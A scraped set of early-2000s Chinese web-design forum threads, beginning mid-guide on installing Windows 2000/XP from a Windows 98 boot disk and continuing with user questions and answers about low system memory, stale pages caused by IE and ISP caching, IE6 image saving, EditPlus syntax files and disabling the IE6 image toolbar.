3、Format c：（如果需要安装许多应用软件且不想经常重装系统，建议c：最好不要低于3G，我用5G）
4、运行启动盘上的SmartDrv（可能需要运行两次或更多，直到你可以在屏幕上看到运行结果，否则从光盘上copy文件的过程将会是场恶梦，特别是XP，有朋友创造过copy8小时的记录）
5、转到光驱盘符下，进入2000光盘的 i386 目录，运行winnt（XP是 i386 下的winnt）
6、之后按提示安装（建议使用NTFS）
7、OK

以上方法在多种机器上均实际安装成功，唯一失败是一台IBM ThinkPad A21m 笔记本（后经多方筹集得到4张软盘制作2000启动盘后，成功安装）

当你没有2000或XP启动盘时且不幸是非启动光盘时，可以使用上述方法，万一真的不行只有多找几张软盘了，现在的软盘到用起来还真不好找

[这消息被BIGBUG编辑过(编辑时间2001-11-15 13:50:22)]

等我想想再签
DW5

阻击之眼
积分：2678
发帖：2517
来自：blueidea
注册：2001-07-29
 发表于 2001-11-15 13:49:37 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP
这个谁不会啊？？？？？？？

永远走在时代的最前端。。。

Blueidea Cs Team
Team Nicker
-]Blueidea[- Y.DW5

BIGBUG

终级用户
积分：1095
发帖：720
来自：不一定
注册：2001-03-21
 发表于 2001-11-15 13:57:04 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
DW5在上个帖子中说
引用:
这个谁不会啊？？？？？？？

未必！过程很简单，主要是说明Smartdrv的加载很重要，我认识的很多对电脑很熟悉的人都在阴沟里翻了船

再说水平不一样，初学者还是可以看一看的

等我想想再签
underline

初级用户
积分：0
发帖：2
来自：cz.js.china
注册：2001-11-15
 发表于 2001-11-15 14:25:02 按此观看underline的个人资料 按此发邮件给underline underline 的 oicq 是55660537,查看 55660537 的资料 发送悄悄话给underline 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看underline的IP
看看没什么坏处啊!

命到定时，终须有。
若是无缘，莫强求。
cfluodongyu2

初级用户
积分：127
发帖：32
来自：
注册：2002-05-18
 发表于 2002-05-18 14:16:45 按此观看cfluodongyu2的个人资料 按此发邮件给cfluodongyu2 cfluodongyu2 的 oicq 是17696170,查看 17696170 的资料 发送悄悄话给cfluodongyu2 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cfluodongyu2的IP
我想请教一下,只把XP光盘中的I386目录复制到硬盘上执行WINNT装不上XP系统怎么办啊,当时屏幕出现了几行英文提示,可惜我是学俄语的没有看懂。我想问一下，光是拷贝I386上当可不可以呀！
小弟先行谢过了！

好的交流能使我们走近完美！
wx@ay

看不懂
积分：7349
发帖：5076
来自：ay.ha.cn
注册：1999-12-23
 发表于 2002-05-18 19:05:37 wx@ay 的 oicq 是1850777,查看 1850777 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
WIN2K 只复制I386来安装是没有问题的。
XP没用过 。。。

Think like a Genius.

忘掉她/忘掉你没有的东西/忘掉别人的东西/忘掉你失去以后就不能再得到地东西/忘掉仇恨/忘掉屈辱/就像犀牛忘记草原/水鸟忘记湖泊/地狱忘记天堂/落叶忘记风/但是我决定不忘掉你

DW5

阻击之眼
积分：2678
发帖：2517
来自：blueidea
注册：2001-07-29
 发表于 2002-05-19 09:33:29 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP
XP的安装和2000是一样的。。。

最好你把所有文件都复制

永远走在时代的最前端。。。

Blueidea Cs Team
Team Nicker
-]Blueidea[- Y.DW5

上一贴 | 下一贴
快速回复 | 主题：如何用98启动盘安装2000和XP！（不会请进）
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


如何才能有效地提高系统内存？

计算机技术
如何才能有效地提高系统内存？

上一贴 | 下一贴
发表人 主题: 如何才能有效地提高系统内存？
天涯剑客

初级用户
积分：0
发帖：2
来自：
注册：2001-10-08
 发表于 2001-11-06 21:13:22 按此观看天涯剑客的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给天涯剑客 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天涯剑客的IP
如何才能有效地提高系统内存？
为何我的PC开机后的内存总是只有30%左右
我安装了一个内存整理软件，但是总是在运行过程中长时间没有反映。
有什么更好的办法可以更有效地提高系统内存呢？向各位高手请教。
solomon

锋子
积分：1700
发帖：2813
来自：Mahabrahman
注册：2001-04-01
 发表于 2001-11-06 21:32:04 按此观看solomon的个人资料 按此发邮件给solomon 访问solomon的主页 solomon 的 oicq 是2300666,查看 2300666 的资料 发送悄悄话给solomon 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看solomon的IP
物理内存有多大？

杀过毒嘛？

年轻人不要着急挣钱，
也不要着急建立什么关系！

重要的是先把自己的基础夯实！

挣钱不是挣一时，
要挣就挣一辈子！！！

Blueidea Web Team.
Team Spalpeen.

hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-11-06 21:37:40 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
加物理内存，还有就是用优化内存的软件（魔法兔子一类的）做下优化

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
天涯剑客

初级用户
积分：0
发帖：2
来自：
注册：2001-10-08
 发表于 2001-11-06 22:25:43 按此观看天涯剑客的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给天涯剑客 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天涯剑客的IP
谢谢答复！
我的物理内存是64M
我想我的PC应该没有病毒
solomon在上个帖子中说
引用:
物理内存有多大？

杀过毒嘛？

天涯剑客

初级用户
积分：0
发帖：2
来自：
注册：2001-10-08
 发表于 2001-11-06 22:27:38 按此观看天涯剑客的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给天涯剑客 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天涯剑客的IP
谢谢答复！
我已安装了优化内存的软件
不过整理时经常半天没反映
您还有其他方法吗？
hellslayer在上个帖子中说
引用:
加物理内存，还有就是用优化内存的软件（魔法兔子一类的）做下优化
hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-11-06 22:37:38 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
你的内存现在看来似乎不大，看你是什么操作系统，越是接近21世纪的OS，越是吃内存。还有就是如果装了很多软件后，因为注册表的增大，会导致系统资源的极大的消耗，和整体速度的变慢。另外，对你系统分区的硬盘剩余空间也要注意，因为，随着内存的消耗，应用程序会占用硬盘做为缓寸，来提高读写速度，如果硬盘剩余空间不足，也会导致你说的情况。

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
darkvn

小混蛋
现任版主
积分：8225
发帖：2542
来自：不是外星
注册：2001-03-02
 发表于 2001-11-06 23:05:07 按此观看darkvn的个人资料 按此发邮件给darkvn 访问darkvn的主页 darkvn 的 oicq 是2353523,查看 2353523 的资料 发送悄悄话给darkvn 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看darkvn的IP
64m太小了，运行98也只是凑合。再怎么优化也没用拉。

Blueidea Web Team
Moderator Of Dreamweaver & Javascript
秋雁

超级用户
积分：408
发帖：125
来自：江苏
注册：2001-10-30
 发表于 2001-11-06 23:06:06 按此观看秋雁的个人资料 按此发邮件给秋雁 访问秋雁的主页 秋雁 的 oicq 是5480510,查看 5480510 的资料 发送悄悄话给秋雁 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看秋雁的IP
肯定是你的启动组内启动项目多导致！！！！建意修改注册表中的启动组中的选项，去除一些无用的选项！！！或用msconfig来修改启动组中的选项！！！然后在系统中把虚拟内存定为128，就可以了！！！

*********************************
*　 买论坛，空间，域名 就找我　 *
* 特别优惠供应，联系QQ 5480510 *
*********************************
秋雁

超级用户
积分：408
发帖：125
来自：江苏
注册：2001-10-30
 发表于 2001-11-06 23:10:28 按此观看秋雁的个人资料 按此发邮件给秋雁 访问秋雁的主页 秋雁 的 oicq 是5480510,查看 5480510 的资料 发送悄悄话给秋雁 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看秋雁的IP
darkvn在上个帖子中说
引用:
64m太小了，运行98也只是凑合。再怎么优化也没用拉。

谁说的，我现在用的就是64M，不是很好吗！！！

搞网站建设，PS，DW,FS,FLASH！！！！！

*********************************
*　 买论坛，空间，域名 就找我　 *
* 特别优惠供应，联系QQ 5480510 *
*********************************
darkvn

小混蛋
现任版主
积分：8225
发帖：2542
来自：不是外星
注册：2001-03-02
 发表于 2001-11-06 23:49:07 按此观看darkvn的个人资料 按此发邮件给darkvn 访问darkvn的主页 darkvn 的 oicq 是2353523,查看 2353523 的资料 发送悄悄话给darkvn 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看darkvn的IP
秋雁在上个帖子中说
引用:
darkvn在上个帖子中说
引用:
64m太小了，运行98也只是凑合。再怎么优化也没用拉。

谁说的，我现在用的就是64M，不是很好吗！！！

搞网站建设，PS，DW,FS,FLASH！！！！！

在我用k6200-32M的时候，我跟你感觉是一样的。

可是当我用上了新买的机子以后，我的感觉就变了。（althon1.4G-256DDR)

是对速度的感觉。呵呵。

Blueidea Web Team
Moderator Of Dreamweaver & Javascript
CrazyParty

群山之巅
积分：2164
发帖：811
来自：温州
注册：2000-10-14
 发表于 2001-11-07 09:22:13 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP
秋雁在上个帖子中说
引用:
darkvn在上个帖子中说
引用:
64m太小了，运行98也只是凑合。再怎么优化也没用拉。

谁说的，我现在用的就是64M，不是很好吗！！！

搞网站建设，PS，DW,FS,FLASH！！！！！

不会吧，一些PSD图就有XXM的，你怎么打的开？64M的确是再怎么优化也就那样。

这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
qixili

高级用户
积分：227
发帖：76
来自：毛里求斯
注册：2001-04-04
 发表于 2001-12-21 19:51:05 按此观看qixili的个人资料 按此发邮件给qixili 访问qixili的主页 qixili 的 oicq 是24523880,查看 24523880 的资料 发送悄悄话给qixili 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看qixili的IP
怎样删去启动组内启动项目多余的项目？

NO...还我中级用户！！！
yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-21 20:54:36 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
点开始，在运行中输入msconfig，点启动就可以删了，去掉打的钩就可以了，不过有的软件在这里并不能阻止他加载的

WINDFLASH
::浅紫色FORUM::
上一贴 | 下一贴
快速回复 | 主题：如何才能有效地提高系统内存？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


关于IE浏览页面一个匪夷所思的问题。

计算机技术
关于IE浏览页面一个匪夷所思的问题。

上一贴 | 下一贴
发表人 主题: 关于IE浏览页面一个匪夷所思的问题。
马达

初级用户
积分：113
发帖：166
来自：
注册：2001-09-26
 发表于 2001-12-01 21:24:46 按此观看马达的个人资料 按此发邮件给马达 马达 的 oicq 是5712369,查看 5712369 的资料 收藏该主题供以后查看 发送悄悄话给马达 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看马达的IP
问题是这样的：更新了网站以后，链接到页面上，看不见更新的内容。刷新也不行。联络OICQ上的好友，都看的到。
解决的办法：刷新；删除IECookies；删除临时文件；清除历史记录；
结果：行不通。

事出经过：某个凌晨，改完首页以后，连上服务器，更新。打开页面，老样子，刷新，依然。服务器上确认页面被更新后，让在线的朋友打开看看，看到的却是新页面。
在我把IE上一切可删除的东西删掉以后，发现问题依旧。狠下心，直接在服务器上把INDEX删掉，再上页面，还看的到（之前我把IE的历史记录，临时文件都删了的），刷新，还是看的到（老页面）。

其中还有两个细节，就是更新了两次页面。
第一次更新，在页面上看不到。输入的地址是：http://suddenstrike.165game.com
后来改用http://suddenstrike.165game.com/index.html 看到了。
马上又用http://suddenstrike.165game.com登陆，还是看不到。

在新页面中发现有问题，修改后进行第二次更新。
这一次，用http://suddenstrike.165game.com看到的还是最先的老页面
http://suddenstrike.165game.com/index.html看见的是第一次更新的页面，
第二次更新的死活看不见。

无赖下，又把IE里的东西全部删除，下线睡觉。

上面的只算是些奇怪的问题，下面说说匪夷所思的东西。

1.我一直在2000下工作，98很少用，也没有用他打开过这个页面。
在我换到98下，打开这个页面时，看到的竟然也是原来的老页面。后面加上/index.html后，看到的和2000一样，是第一次的更新，而不是最新的页面。

2.在我更新后第三天的一个中午，突然把新的页面刷了出来。
我什么没做，就是习惯性的打开，一刷，新的就出来了。

3.高兴劲还没过，继续更新时，发现又出了老问题，看见的变成原来一直看不到的第二次更新，刚刚修改过的，又看不到了。一直到今天，事发一周后，我还是看不到。
但是其他人在他们的电脑上都看的到。

4.我用朋友的电脑（和我用一条线上网）打开页面，开出来的和我机子上一样，我能看见什么样的，那边亦然（他从没打开过这个地址），看不见更改过的。

5.这个问题只出现在这个站点（服务器）上。

天道何从？

半调子

=]Blueidea[=Y. 5.56mm

wjack

高级用户
积分：201
发帖：47
来自：上海
注册：2000-10-26
 发表于 2001-12-01 22:19:05 按此观看wjack的个人资料 按此发邮件给wjack 访问wjack的主页 wjack 的 oicq 是393382,查看 393382 的资料 发送悄悄话给wjack 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wjack的IP
这个问题在我配置服务器环境的时候经常出现，有一次一个站点是给新加坡人做得，他们说死活看不到更新的叶面，而我怎么都看得到，差点没有把我急的买张机票到新加坡去骂他们怎么这么笨。这是个超级难题，不过，经过长时间的摸索，现在的进展很有限，但是找到其中的一个原因：
配过IIS的人想必都知道需要设置一个网站的默认文档的文名，很多新手总是认为网站的首页要叫index.html,其实，IIS的默认文档应该是default.htm，当然一般我们都会添加一个index.html index.htm 问题好像就在这里，IIS好像隐藏了不为人知的缓存机制，微软总是鬼鬼祟祟的，妈的，鞭他！！如果首选的默认文件是 default.htm 而你非要把首页叫 index.html 或者 index.htm 就有可能会出现你说的那种怪问题，所以，我建议你把文件名改成default.htm试试看。不过不一定管用。
不过，我只是随便说说，这个问题很玄的，我没有弄得彻底明白，不知道还有没有人有新的见解。

网站建设资源站，吐血推荐：
http://www.subdesigner.com
yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-01 22:23:20 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
按照我说的看看，打开internet选项，点internet临时文件中的设置，把检查网页中是否有最新版本，选择自动，呵呵！~应该ok了，我以前就有这个问题啦！~

WINDFLASH
::浅紫色FORUM::
wjack

高级用户
积分：201
发帖：47
来自：上海
注册：2000-10-26
 发表于 2001-12-01 22:25:23 按此观看wjack的个人资料 按此发邮件给wjack 访问wjack的主页 wjack 的 oicq 是393382,查看 393382 的资料 发送悄悄话给wjack 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wjack的IP
yuzhiqing在上个帖子中说
引用:
按照我说的看看，打开internet选项，点internet临时文件中的设置，把检查网页中是否有最新版本，选择自动，呵呵！~应该ok了，我以前就有这个问题啦！~

马达不会同意你的说法的，我的新加坡客户也会说no的

网站建设资源站，吐血推荐：
http://www.subdesigner.com
yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-01 22:29:33 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
兄弟，我说的意思是ie不能检查网页更新的问题，你的意思是？

WINDFLASH
::浅紫色FORUM::
火鸟王

终级用户
积分：473
发帖：274
来自：盈动数码
注册：2000-08-22
 发表于 2001-12-01 23:55:09 按此观看火鸟王的个人资料 按此发邮件给火鸟王 访问火鸟王的主页 发送悄悄话给火鸟王 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看火鸟王的IP
我也遇到过类似情况!一个ASP的新闻发布程序让公司的输入员在上面发布新闻填了十来条新闻都提交后,她的机子上看不到首页的新闻题头,老板那台机子上也看不到更新的新闻,而在我这台机子上可以看到,我们用的是ADSL,同一条线路.同时我又叫其它地方的网友测试也可以看到,我怎么也想不通,她发的新闻怎么自己都看不到更新[在线发的,服务器不在本地]

千淘万漉虽辛苦，吹尽狂沙始到金。
马达

初级用户
积分：113
发帖：166
来自：
注册：2001-09-26
 发表于 2001-12-02 01:35:35 按此观看马达的个人资料 按此发邮件给马达 马达 的 oicq 是5712369,查看 5712369 的资料 发送悄悄话给马达 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看马达的IP
wjack在上个帖子中说
引用:
……
如果首选的默认文件是 default.htm 而你非要把首页叫 index.html 或者 index.htm 就有可能会出现你说的那种怪问题，所以，我建议你把文件名改成default.htm试试看。不过不一定管用。
……

但问题是，如果服务器默认的是default.htm，那么，我的index.html只是一个普通的页面，既然这样，我用……/index.html就应该可以看到它了。
肯定有一个缓存存在，但不知道在什么地方。因为我在服务器把index.html删除了以后，还可以在电脑上浏览到它，而我的缓存是删干净了的。这是其一。
其二，问题在于问题只出现在我的这台电脑（这根线路），其他人皆可以正常浏览。

半调子

=]Blueidea[=Y. 5.56mm

wjack

高级用户
积分：201
发帖：47
来自：上海
注册：2000-10-26
 发表于 2001-12-02 01:50:37 按此观看wjack的个人资料 按此发邮件给wjack 访问wjack的主页 wjack 的 oicq 是393382,查看 393382 的资料 发送悄悄话给wjack 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wjack的IP
我一直怀疑 ISP 方面也是有缓存的，目的是为了制造让线路的速度快一些的假象，多拉一些用户，但是没有玩过ISP方面的东西，也不敢确定，总之，网站做的多了，就会发现cache实乃我等之大敌。

网站建设资源站，吐血推荐：
http://www.subdesigner.com
POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
 发表于 2001-12-02 01:59:26 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
偶也正被cache折磨着

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

嘿嘿

坏笑
积分：403
发帖：524
来自：
注册：2001-10-06
 发表于 2001-12-02 21:59:12 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
wjack在上个帖子中说
引用:
我一直怀疑 ISP 方面也是有缓存的

这还用怀疑吗，我已经在N本书上看到过这方面的叙述了，说是为了提高用户的浏览速度，狗屁！
我曾经连续一个月进不了经典的首页，每次都是被连进了灰灰菜的家，而且还是缺了一半图片的，那才叫可怜呢......

缘是天定,份在人为.
上一贴 | 下一贴
快速回复 | 主题：关于IE浏览页面一个匪夷所思的问题。
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


关于IE下载图片问题

计算机技术
关于IE下载图片问题

上一贴 | 下一贴
发表人 | 主题: 关于IE下载图片问题
redfall 秋意浓 艺设版主 积分：1123 发帖：1279 来自：柳州-深圳 注册：2001-07-25 | 发表于 2001-11-29 15:38:11 按此观看redfall的个人资料 按此发邮件给redfall 访问redfall的主页 收藏该主题供以后查看 发送悄悄话给redfall 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看redfall的IP 自从安装了IE6，如果在网上看到有漂亮的图片击右键图片另存时， 无论对方是什么格式的图片（*.gif、*.jpg ...)，我这IE里总是显示“无标题.bmp”， 文件名都要重命名的，请问这是怎么一回事？ -- 阳光被不断飘过的云朵遮住，室内的光线忽明忽暗。 -- 她习惯向左走，他习惯向右走，他们始终不曾相遇。 Blueidea Web Team. Moderator Of Art & Design Forum
yunbin 经典强盗 现任版主 积分：2292 发帖：1001 来自：火星 注册：2001-09-27 | 发表于 2001-11-29 15:50:29 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 因为Temporary Internet Files文件夹空间不够所造成的， 只 要重新调整Temporary Internet Files文件夹的大小 (或清除文件夹里面的东西)就可以很好地解决这个问 题了。打开IE，单击菜单栏里的“工具→Internet选 项”，在“常规”选项中的“Internet临时文件”里再单 击“设置”按钮，根据你的硬盘容量来调整 Temporary Internet Files文件夹的大小(如果你的硬 盘很大，最好文件夹的容量也相对设置得大一些)。 A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
redfall 秋意浓 艺设版主 积分：1123 发帖：1279 来自：柳州-深圳 注册：2001-07-25 | 发表于 2001-11-29 16:06:02 按此观看redfall的个人资料 按此发邮件给redfall 访问redfall的主页 发送悄悄话给redfall 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看redfall的IP 呵呵，真的一试就灵。谢谢啦。 -- 阳光被不断飘过的云朵遮住，室内的光线忽明忽暗。 -- 她习惯向左走，他习惯向右走，他们始终不曾相遇。 Blueidea Web Team. Moderator Of Art & Design Forum
上一贴 | 下一贴
快速回复 | 主题：关于IE下载图片问题
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


用Editplus的朋友可能要的东西。

计算机技术
用Editplus的朋友可能要的东西。

上一贴 | 下一贴
发表人 | 主题: 用Editplus的朋友可能要的东西。
mingox 超级用户 积分：412 发帖：121 来自：深圳 注册：2001-07-10 | 发表于 2001-11-21 14:40:51 按此观看mingox的个人资料 按此发邮件给mingox 访问mingox的主页 mingox 的 oicq 是324188,查看 324188 的资料 收藏该主题供以后查看 发送悄悄话给mingox 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mingox的IP 放在这里我想不会不合适吧，这里都是做网页的，Editplus是做叶子不可或缺的。放在别的地方就可能看不到了，希望和大家共享。 下载editplus高亮显示文件 我们在这里：MX根据地[img]http://www.mingox.com/bbs/img/code4life.gif[/img]
mmkk 我是谁 积分：7953 发帖：2352 来自：FJ,China 注册：2001-04-04 | 发表于 2001-11-21 20:04:31 按此观看mmkk的个人资料 按此发邮件给mmkk mmkk 的 oicq 是35262348,查看 35262348 的资料 发送悄悄话给mmkk 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mmkk的IP 大部分都有了,就是PB好像没有看过,不过用这个写PB不是晕倒 本头像由诺婷提供^^！ 高兴就好
上一贴 | 下一贴
快速回复 | 主题：用Editplus的朋友可能要的东西。
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


共享一个IE6小技巧~~~

计算机技术
共享一个IE6小技巧~~~

上一贴 | 下一贴
发表人 主题: 共享一个IE6小技巧~~~
POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
 发表于 2001-11-13 14:39:47 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 收藏该主题供以后查看 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
IE6里，在鼠标移到图片上时会出现一个快捷工具条，这就是IE6的Image toolbar，有两种办法可以屏蔽：
1.在工具-->Internet选项-->高级-->多媒体-->启用图片工具栏，取消勾选；
2.但是，一般安装IE6后这项是自动选中的，不能要求所有的用户都这样去取消勾选吧，所以可以在页面中加：
a) <META HTTP-EQUIV="imagetoolbar" CONTENT="no">，加在<head>里；
或
b) 这样写：<img src="xxx.gif" GALLERYIMG="no">

翻MSDN时偶然找到，一起共享

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

darkvn

小混蛋
现任版主
积分：8225
发帖：2542
来自：不是外星
注册：2001-03-02
 发表于 2001-11-13 15:21:36 按此观看darkvn的个人资料 按此发邮件给darkvn 访问darkvn的主页 darkvn 的 oicq 是2353523,查看 2353523 的资料 发送悄悄话给darkvn 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看darkvn的IP
thanks POP，（从哪看来的？ ）

Blueidea Web Team
Moderator Of Dreamweaver & Javascript
POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
 发表于 2001-11-13 15:28:53 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
darkvn在上个帖子中说
引用:
thanks POP，（从哪看来的？ ）

偶也忘了，好象是MSDN，经典当机时偶发在闪客帝国了，现在让她回娘家~~~

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

poorfish

经典圣僧
现任版主
积分：10941
发帖：3503
来自：江西萍乡
注册：2000-12-04
 发表于 2001-11-13 15:31:37 按此观看poorfish的个人资料 按此发邮件给poorfish 访问poorfish的主页 poorfish 的 oicq 是1525464,查看 1525464 的资料 发送悄悄话给poorfish 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看poorfish的IP
取消图片工具栏还有一个方法
图片上出现图片工具栏后，在工具栏上点右键，看到“禁用图片工具栏“了没有

【DW版常见问题解答】【破废墟】

Blueidea Web Team
Moderator of DW & JS Forum

darkvn

小混蛋
现任版主
积分：8225
发帖：2542
来自：不是外星
注册：2001-03-02
